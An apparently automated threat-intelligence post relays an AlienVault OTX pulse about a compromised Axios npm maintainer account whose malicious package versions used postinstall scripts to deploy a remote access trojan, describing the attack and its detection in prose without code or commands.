NPM Package Supply Chain Compromise Leads to RAT Deployment

A supply chain attack targeting the Axios npm package has been identified after threat actors compromised the npm account of the company's lead developer. Malicious versions ([email protected] and [email protected]) were published containing a hidden dependency that executed postinstall scripts during npm installation. This automated execution downloaded and deployed a remote access trojan on affected systems without requiring user interaction, making it particularly dangerous for developer environments and CI/CD pipelines. The compromise resulted in full remote access capabilities, potential credential exposure including API keys and SSH keys, and possible insertion of malicious code into software builds. Detection platforms identified suspicious process execution chains involving npm spawning command interpreters and network utilities, followed by outbound connections to attacker-controlled infrastructure.

Pulse ID: 69d8b0c258b4fef5541358bb
Pulse Link: https://otx.alienvault.com/pulse/69d8b0c258b4fef5541358bb
Pulse Author: AlienVault
Created: 2026-04-10 08:11:46

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #NPM #OTX #OpenThreatExchange #RAT #RemoteAccessTrojan #SSH #SupplyChain #Trojan #Troll #bot #iOS #AlienVault